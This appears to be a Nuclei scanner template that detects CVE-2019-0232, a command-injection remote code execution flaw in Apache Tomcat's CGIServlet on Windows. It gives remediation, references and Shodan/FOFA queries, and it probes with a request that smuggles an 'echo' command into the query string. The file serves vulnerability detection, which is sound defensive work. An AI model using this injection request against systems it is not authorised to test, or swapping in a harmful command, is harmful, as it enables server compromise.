id: CVE-2019-0232

info:
  name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
  author: DhiyaneshDk
  severity: high
  description: |
    When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
  impact: |
    Attackers can execute arbitrary system commands on Windows systems when CGI Servlet is enabled with enableCmdLineArguments, leading to complete server compromise.
  remediation: |
    Upgrade to Tomcat 9.0.18, 8.5.40, 7.0.94 or later, and ensure enableCmdLineArguments is disabled.
  reference:
    - http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
    - http://seclists.org/fulldisclosure/2019/May/4
    - https://access.redhat.com/errata/RHSA-2019:1712
    - https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
    - https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2019-0232
    cwe-id: CWE-78
    epss-score: 0.94221
    epss-percentile: 0.99927
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    vendor: apache
    product: tomcat
    shodan-query:
      - http.html:"apache tomcat"
      - http.title:"apache tomcat"
      - http.html:"jk status manager"
      - cpe:"cpe:2.3:a:apache:tomcat"
    fofa-query:
      - body="jk status manager"
      - body="apache tomcat"
      - title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2019,packetstorm,seclists,apache,tomcat,vkev,vuln

variables:
  sid: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        GET /?&echo+{{sid}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{sid}}"

      - type: word
        negative: true
        part: body
        words:
          - "echo {{sid}}"
          - "echo+{{sid}}"

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204c8e485962b7667d592f22676a54b1c572a8d6b4891dfc73bff7932114e300a0022100c792f0335f48a48f8107e779572b550a68dee73733b88a2d1cba7afe321b1253:922c64590222798bb761d5b6d8e72950